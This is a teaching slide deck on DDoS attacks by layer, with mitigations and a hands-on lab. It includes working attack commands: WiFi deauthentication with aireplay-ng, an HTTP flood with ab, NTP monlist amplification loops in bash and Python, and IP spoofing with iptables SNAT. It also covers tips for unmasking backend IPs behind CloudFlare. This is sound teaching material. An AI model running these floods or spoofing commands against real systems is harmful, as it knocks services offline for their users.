DDoS Artūrs Lavrenovs
What is DDoS? DoS - denial-of-service attack is an attempt to make a machine or network resource unavailable to its intended users. DDoS are DoS attacks sent by two or more sources.
DDoS in a nutshell How DDoS works? Consumes any kind of resources required to process legitimate actions How to deal with DDoS? Allocate more resources than size of DDoS attack Try to filter out bad stuff
Who are the victims? Anything related to $ - Banks, CC processors, Online payment systems, Insurance/Investment/Financial/Trading companies Political sites Government sites News sites Piracy sites and anti-piracy outfits Game servers Almost any kind of business
Which OSI levels are susceptible to DDoS? ALL
OSI 1 st level - Physical Shared physical link for example: WiFi, radio, mobile, GPS, satellite Generate radio noise Can use as countersurveillance Price starting from few dozen $ Big devices (>1000$) can cover >1km How to deal with this DDoS? Use radar gun to locate signal source Call responsible agency (they will send a van with antennas on the roof) because it is a serious issue
Responsible agency: Latvia VAS Elektroniskie sakari Radiofrekvenču uzraudzības nodaļas Radiokontroles daļa http://vases.lv/lv/par_mums/kontaktinformacija/
OSI 2 nd level Data Link WiFi (802.11) deauthentication Can disconnect all WiFi users Flood deauthentication packets so nobody can connect (or flood all except yourself) aireplay-ng --deauth 1000 -a 00:11:22:33:44:55 wlan0 Powerful enough external WiFi card can interfere with clients inside building from outside How to deal? You have to find source and remove it (same as 1 st )
OSI 2 nd level Old school: MAC flooding Wired networking with switches Switches maintain MAC table in RAM (limited size), it maps MAC address<->physical ports Attacker floods Ethernet frames with random MAC When MAC tables overflows switch becomes hub and floods traffic out of all ports Not only DoS but also used for packet sniffing Solution - get a better switch Limiting MAC addresses per physical port Managed Switches
OSI 3 rd level Volumetric DDoS At this level reside volumetric DDoS Use more bandwidth that available to victim bits per second (bps) Send more packets that can be handled packets per second (pps) Victim has limited bandwidth available (e.g., 100mbps or 1gbs link) when link is saturated packets are getting dropped Including legitimate user packets, service slows down till it has became unusable How to deal with volumetric DDoS? You can't. At least not on your own.
OSI 3 rd level Network Spoofing IP At 3 rd level occurs source of the volumetric and other DDoS problems IP spoofing No ISP should allow packets with spoofed IP to leave their network Lots of bad ISPs, mostly in 3 rd world countries and places where are a lot of Internet Can't efficiently filter spoofed IP away from the source, effective only on your edge (BCP38) Volumetric DDoS without IP spoofing is far less efficient and could be filtered
OSI 3 rd level Spoofing IP
Volumetric DDoS Reflection/Amplification DNS, NTP, SNMP, ICMP reflection Create packets with spoofed victim's IP and send to reflectors Reflectors create response and send it to victim Amplification Response size usually bigger than request size so Amplification happens Increase amplification by crafting requests which generate bigger responses Potential for amplification 10x-100x If you have 1gbps spoofable uplink you can create up to 100gbps attack enough to kill small/medium DC/ISP
Volumetric DDoS Old school: Smurf attack ICMP reflection+amplification, packets are sent to network's broadcast IP Not viable attack anymore ISPs are blocking packets sent to broadcast IP
Volumetric DDoS DNS amplification DNS queries are short and usually answers are short as well, e.g., 1 IP address for A query Fill domain with some trash entries and query something specific or ANY (not all open resolvers might handle) Fill domain with many A entries (almost all open resolvers should handle) DNS resolver should use TCP if answer >512B long DNSSEC adds cryptographic signatures and keys to publicly visible records Luckily (misconfigured) server count is still low DNS server can be attacked (CPU intensive queries)
$ dig wradish.com ANY ;; Truncated, retrying in TCP mode. ; <<>> DiG 9.8.1-P1 <<>> wradish.com ANY ;; global options: +cmd ;; Got answer: ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 45484 ;; flags: qr rd ra; QUERY: 1, ANSWER: 10, AUTHORITY: 0, ADDITIONAL: 0 ;; QUESTION SECTION: ;wradish.com. IN ANY ;; ANSWER SECTION: wradish.com. 5 IN TXT "asdfasdfasdfasdf asdfasdfasdfasdf asdfasdfasdfasdf asdfasdfasdfasdf asdfasdfasdfasdf asdfasdfasdfasdf asdfasdfasdfasdf asdfasdfasdfasdf asdfasdfasdfasdf asdfasdfasdfasdf asdfasdfasdfasdf asdfasdfasdfasdf asdfasdfasdfasdf asdfasdfasdfasdf asdfasdfasdfasdf " "asdfasdfasdfasdf asdfasdfasdfasdf asdfasdfasdfasdf asdfasdfasdfasdf asdfasdfasdfasdf asdfasdfasdfasdf asdfasdfasdfasdf asdfasdfasdfasdf asdfasdfasdfasdf asdfasdfasdfasdf" wradish.com. 5 IN TXT "tttttttttttttyyyyyyyy tttttttttttttyyyyyyyy tttttttttttttyyyyyyyy tttttttttttttyyyyyyyy tttttttttttttyyyyyyyy tttttttttttttyyyyyyyy tttttttttttttyyyyyyyy tttttttttttttyyyyyyyy tttttttttttttyyyyyyyy tttttttttttttyyyyyyyy tttttttttttttyyyyyyyy ttttttttttttt" "yyyyyyyy tttttttttttttyyyyyyyy tttttttttttttyyyyyyyy tttttttttttttyyyyyyyy tttttttttttttyyyyyyyy tttttttttttttyyyyyyyy tttttttttttttyyyyyyyy tttttttttttttyyyyyyyy tttttttttttttyyyyyyyy tttttttttttttyyyyyyyy tttttttttttttyyyyyyyy tttttttttttttyyyyyyyy tttt" "tttttttttyyyyyyyy tttttttttttttyyyyyyyy tttttttttttttyyyyyyyy" wradish.com. 5 IN TXT "hkhkhaksdfhasdhfasdfhalsdfhkhkhaksdfhasdhfasdfhalsdfhkhkhaksdfhasdhfasdfhalsdfhkhkhaksdfhasdhfasdfhalsdfhkhkhaksdfhasdhfasdfhalsdfhkhkhaksdfhasdhfasdfhalsdfhkhkhaksdfhasdhfasdfhalsdf hkhkhaksdfhasdhfasdfhalsdfhkhkhaksdfhasdhfasdfhalsdfhkhkhaksdfhasdhfasdfh" "alsdfhkhkhaksdfhasdhfasdfhalsdfhkhkhaksdfhasdhfasdfhalsdfhkhkhaksdfhasdhfasdfhalsdfhkhkhaksdfhasdhfasdfhalsdfhkhkhaksdfhasdhfasdfhalsdfhkhkhaksdfhasdhfasdfhalsdfhkhkhaksdfhasdhfasdfh alsdfhkhkhaksdfhasdhfasdfhalsdfhkhkhaksdfhasdhfasdfhalsdfhkhkhaksdfhasdhf" "asdfhalsdfhkhkhaksdfhasdhfasdfhalsdfhkhkhaksdfhasdhfasdfhalsdfhkhkhaksdfhasdhfasdfhalsdfhkhkhaksdfhasdhfasdfhalsdfhkhkhaksdfhasdhfasdfhalsdfhkhkhaksdfhasdhfasdfhalsdfhkhkhaksdfhasdhf asdfhalsdfhkhkhaksdfhasdhfasdfhalsdfhkhkhaksdfhasdhfasdfhalsdfhkhkhaksdfh" "asdhfasdfhalsdfhkhkhaksdfhasdhfasdfhalsdfhkhkhaksdfhasdhfasdfhalsdfhkhkhaksdfhasdhfasdfhalsdfhkhkhaksdfhasdhfasdfhalsdfhkhkhaksdfhasdhfasdfhalsdfhkhkhaksdfhasdhfasdfhalsdfhkhkhaksdfh asdhfasdfhalsdfhkhkhaksdfhasdhfasdfhalsdfhkhkhaksdfhasdhfasdfhalsdf" wradish.com. 5 IN TXT "asdfasfwerwer234234234 asdfasfwerwer234234234 asdfasfwerwer234234234 asdfasfwerwer234234234 asdfasfwerwer234234234 asdfasfwerwer234234234 asdfasfwerwer234234234 asdfasfwerwer234234234 asdfasfwerwer234234234 asdfasfwerwer234234234 asdfasfwerwer234234234 as" "dfasfwerwer234234234 asdfasfwerwer234234234 asdfasfwerwer234234234 asdfasfwerwer234234234 asdfasfwerwer234234234 asdfasfwerwer234234234 asdfasfwerwer234234234 asdfasfwerwer234234234 asdfasfwerwer234234234 asdfasfwerwer234234234" wradish.com. 5 IN TXT "test test teststtest test teststtest test teststtest test teststtest test teststtest test teststtest test teststtest test teststtest test teststtest test teststtest test teststtest test teststtest test teststtest test teststtest test teststtest test tests" "ttest test teststtest test teststtest test teststtest test teststtest test teststtest test teststtest test teststtest test teststtest test test test teststtest test teststtest test teststtest test teststtest test teststtest test teststtest test teststtest" " test teststtest test teststtest test teststtest test teststtest test teststtest test teststtest test teststtest test teststtest test teststtest test teststtest test teststtest test teststtest test teststtest test teststtest test teststtest test teststtes" "t test teststtest test test test teststtest test teststtest test teststtest test teststtest test teststtest test teststtest test teststtest test teststtest test teststtest test teststtest test teststtest test teststtest test teststtest test teststtest tes" "t te" wradish.com. 5 IN MX 10 mailstore1.secureserver.net. wradish.com. 5 IN MX 0 smtp.secureserver.net. wradish.com. 5 IN SOA ns19.domaincontrol.com. dns.jomax.net. 2014042218 28800 7200 604800 600 wradish.com. 5 IN NS ns20.domaincontrol.com. wradish.com. 5 IN NS ns19.domaincontrol.com. ;; Query time: 5 msec ;; SERVER: 91.198.156.20#53(91.198.156.20) ;; WHEN: Tue May 13 02:48:07 2014 ;; MSG SIZE rcvd: 3782
Why Volumetric DDoS attacks work? Millions of misconfigured/vulnerable network devices DNS http://openresolverproject.org/ 28 million significant threats (May 2014) CloudFlare received 300gbps DDoS (March 2013) NTP Christmas present of 2013 CloudFlare received 400gbps (February 2014) only 4529 vulnerable NTP servers used
Volumetric DDoS - mitigation What is most common way to mitigate volumetric DDoS? Null-routing IP (attackers have achieved their goal) ISP/DC have to protect their network and customers How to deal with volumetric DDoS? Have/buy more IP transit and have enough processing power for packets Buy filtered IP transit How to deal with all volumetric DDoS in long run? Remove option to send spoofed IP (filtering on IP transit provider links) (hard) Remove all vulnerable servers (almost impossible)
OSI 4 th level - Transport TCP stack implementation requires tables and buffers in RAM allocated by OS SYN flood flood server with TCP SYN packets Send from different spoofed IP and different ports Server creates entry in TCP state table for each SYN packet Maximum entries (IP)2^32*(ports)2^16 takes more memory than available How to deal? Best practice is SYN cookies Proposed future standard TCPCT (solves some SYN cookies issues and instead creates other)
OSI 4 th level TCP SYN cookies Do not store SYN in state table SYN cookie = ($t%32)(mss)hash(sip,sp,dip,dp,$t) $t is timestamp with precision of 64 seconds MSS - maximum segment size Send to client SYN/ACK with initial TCP sequence number == SYN cookie Client responds with SYN cookie+1 Server calculates again and if matches establishes TCP session (responds with ACK and adds to TCP state table) Check (set) in Linux # sysctl net.ipv4.tcp_syncookies
OSI 4 th level Non amplified volumetric TCP DDoS Smaller than amplified UDP attacks (10xn gbps instead of 100xn gbps) Victim still (cookies don't help) have to reply with SYN/ACK packet if received SYN with spoofed IP Victim have to process all packets as real ones, it requires bandwidth equal to attackers (also high pps) Solution - intelligent analysis, requires a lot of processing power Does IP match some previous data (historical HTTP logs) Block dubious networks (DC, not announced, GEO)
OSI 4 th level Reflected TCP DDoS Attackers send SYN packets with spoofed victim's IP to real world servers with TCP services Real world servers send SYN/ACK to victim Fairly easy to deal with Victim (if server) has no reason to receive SYN/ACK Drop all SYN/ACK as far from victim as possible (ISP edge)
OSI 5 th level - Session RPC, NFS, PPTP, NetBIOS, etc. Weaknesses in implementations Spoofed IP Session terminations End device overloading Least interesting DDoS
OSI 6 th level - Presentation Most common target SSL (especially for $ category) Send lots/malformed SSL requests SSL consumes a lot of CPU cycles Response time decreases till service has become unusable Solution: SSL offloading + IDS/IPS/proprietary filtering systems Potential for DDoS compression Takes CPU cycles + memory Find on-demand compression and put/get as much as You can Solution: limiting and analyzing at 7 th OSI level
OSI 7 th level HTTP, FTP, POP, SMTP In case of TCP protocols IP spoofing does not work, You need a botnet Simple HTTP DoS: ab -n 100000 -c 1000 http://victim/ Solution: limit requests in HTTP server or OS firewall HTTP DDoS solution Identify real user used limits Set them in HTTP server/os firewall Big botnet with each IP sending less requests than limit (GEO filters, prolonged logs)
OSI 7 th - Slowloris HTTP DDoS Evil client create as many concurrent HTTP connections as possible (lower than FW limitations) Keep connections open as long as possible Periodically send partial requests Multiple evil clients can exhaust HTTP server active connection pool Solution Use HTTP server with huge connection pools (e.g., nginx) Use some security ad-don
OSI 7 th + level Web applications residing in a web server Find slow processing parts of web application Usually data creation, deletion, modification Text search, DB LIMIT 435345,344 Send less requests than limited in 7 th level Find scripts that don't check parameter bounds, example Protection against bots captcha.php?length=5 captcha.php?length=5555555 consumes RAM and blocks till timeout (e.g., 60 seconds) 1req/sec blocks 60 PHP processes, 10req/s DDoS
IP spoofing before edge filtering Some ISP and DC have implemented IP filtering only on the edge (clients can spoof IP inside network) If network if big enough there are lots of different servers (DNS, NTP, HTTP) You can spoof victim's IP and create reflected DDoS (including TCP) Whole attack will originate from network you are using Easier to filter for victim, easier to notice by reflector network, easier to find attacker
Web savior CloudFlare CDN provider data centers across the globe Security includes DDoS protection which can handle biggest attacks Enough bandwidth to handle volumetric attacks Filters all DDoS, including OSI 7 th lvl Cheap 200$/month, previous comparable outsourced services would cost >1000$/mo Much cheaper than handling security yourself (man hours, hardware/software, outsource) if DDoS is eventually expected
Why not everyone using CloudFlare? USA company (all your data are available to NSA/FBI/CIA and any other organizations) All your data are handled by 3 rd party Have to give up your SSL certificate (big no-no for $ related sites) Privacy concerns ToS, Legal issues Does not protect network services (only Web) IP sharing (issues in countries/networks which block access to some content)
How to DDoS CloudFlare site? Don't waste effort attacking CloudFlare Find huge bug in 7 th+ OSI level which allows to DDoS using very few requests (rare) Volumetric DDoS backend IP, how to find: Use security audit tools to locate backend IP crawls site and searches for pattern 1.2.3.4 for example in error messages (that is why you have to turn off all error reporting) Google for domain IP history, possibly backend is the same
How other filtering services work? Buy a lot of bandwidth from big DCs Volumetric DDoS uses download BW DCs have symmetrical links DCs usually are traffic generators (most servers use upload BW) Download BW can be bought at a fraction of the upload BW price Drop UDP, ICMP packets Intelligent TCP filtering Browser stack verification (is JavaScript implemented challenge/response) Statistical filtering (against HTTP flood)
DDoS redirection Common scenario botnet (or bought servers) in misconfigured networks queries DNS A record and (create amplified reflected volumetric DDoS) spoof IP accordingly Victim changes A record to suspected attacker, somebody he does not like or some government/military/law enforcement agency DDoS automatically converge to new victim Extremely gray area (possibly illegal) and victim should never do that Redirect attack to some of the attacking reflector nodes (e.g., misconfigured DNS servers)
(H-)Activism DDoS New form of protest Against government, big corporations, anyone else who people feel have been attacking their freedoms and interests LOIC (Low Orbit Ion Cannon) free software users choose to install to create TCP/UDP flood When many users launch LOIC to the same target it creates DDoS No reflection/amplification so can be filtered and users can be identified Richard Stallman has stated that DoS is a form of 'Internet Street Protests' Government treats as criminals
DDoS economics If attack is not used as form of protest then it is usually carried out by some DDoS service Cheap and small attacks starting 20$/day can break website with no/low protection Average attacks starting 50$/day can break site without protection against volumetric attacks (most average and even big sites) Ordering DDoS usually is cheaper than ordering filtering for victims (already victory for evil) Huge additional competing advantage (e.g., e-shop is down) Almost impossible to identify who is responsible
How people order DDoS? Use search engine Select one of many verified offers Get free test (10min) Order by hourly/daily rate (refunds available) Pay using shady online payment systems with high anonymity Never get caught
Professional DDoS Complex attack (efficient way is to wait till victim has dealt with issues before moving to next one) Check if weak authoritative NS (self hosted) then flood it Volumetric UDP DDoS Spoofed TCP flood HTTP attack with botnet (usually web stack implemented) Web application attack Dedicated hacker altering attack and analyzing 7 th+ level weaknesses Pricing >=1000$/day If you can counter such you are a rare professional
Unintentional DDoS By default most sites are not built and equipped to handle lots of (nx current number of users) legitimate users There are huge sites with millions of users where people post links reddit, slashdot, facebook Link to unprepared site gets posted and legitimate users kill it Web service specifics (usually found unintentionally and then exploited) FaceBook notes generate list of images and add random parameters, FB servers crawl and cache Google Spreadsheets same approach, use formula =image()
How banks should handle DDoS? Buy filtered IP transit from reliable and big ISP (SLA) Should be dropped all UDP Should be dropped TCP above SLA requirements Buy (proprietary) DDoS filtering device (a lot of $) with SLA and host on-site Bank signs SSL certificate with their own certificate Clients establish SSL connection with filter (using intermediate certificate) and it decides if client is good SSL session renegotiation with bank's servers Certificate never leaves bank's own servers and sensitive user data are never handled by filter as well Filter drops everything else and should handle 10x gbps of TCP
Summary Is UDP bad? Nope. It is actually quite good and useful protocol. Lazy network administrators have not configured their networks against IP spoofing. Is DNS/NTP/(put your protocol here) bad? Still nope. Those are quite useful protocols. Lazy network administrators are to blame Have not updated their server software Have misconfigured servers Commit no security audits Network device (cheap kind) manufacturers. Are You good network administrator?
Hands-on volumetric DDoS (discovery, IP spoofing, reflection, amplification) loosely corresponds to actions of actual attackers
Hands-on: real local network 1.Locate victim 2.Locate potential attack sources 3.Check attack sources 4.Spoof IP address 5.Create DDoS 6.Increase amplification Our setup: Local network = Internet Subnet 10.1.2.0/24
Hands-on: locate victims and attack sources Use some software to map your local network to find victims For example: nmap Choose one of the found web servers as victim There are 2 types of attack available, multiple sources for both, choose one or both Query and check if attack sources work
Hands-on: DNS Query DNS server: # host google.lv # dig google.lv Find queries which generate large responses
Hands-on: NTP ntpdate -q $ntp_server ntpdc -nc monlist $ntp_server Check maximum BW (ifstat -b) #!/bin/bash while true; do ntpdc -n -c monlist $ntp_server > /dev/null & done Why so little BW available?
import socket Hands-on: NTP Python payload = """\x17\x00\x03\x2a\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0 0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x 00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0 0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x 00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0 0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x 00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0 0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x 00\x00\x00\x00\x00""" sock = socket.socket(socket.af_inet, socket.sock_dgram) while True: sock.sendto(payload, ("10.1.2.12", 123))
Hands-on: Spoof IP NTP $ sudo iptables -t nat -A POSTROUTING -p udp --dport 123 -j SNAT --to-source $victim_ip All UPD packets with destination port 123 (default for NTP) will be altered and source will be set to $victim_ip IP can be also spoofed using some tools that can create RAW packets, e.g., Scapy, Nemesis
Hands-on: create DDoS Launch on multiple PCs Python version (if site still up) Or if you can write program in C/C++ Try to access website (or see if it slows down) measure: # time curl -v $victim
Hands-on: increase amplification (NTP) Why small amplification (less than 2x)? monlist response is client list Goal increase client list on server but how? Spoof lots of different IP Send ntpdate -q $ntp_server from each spoofed IP Monlist response maximum client list is 600
Hands-on: Virtual Network version If you want to try yourself: https://sandilands.info/sgordon/ntp-ddos-attack-in-a-virt ual-network https://sandilands.info/sgordon/ping-flooding-dos-attackin-a-virtual-network
Hands-on: Setting things up NTP apt-get install ntp Edit /etc/ntp.conf restrict 10.1.2.0 mask 255.255.255.0 nomodify notrap service ntp restart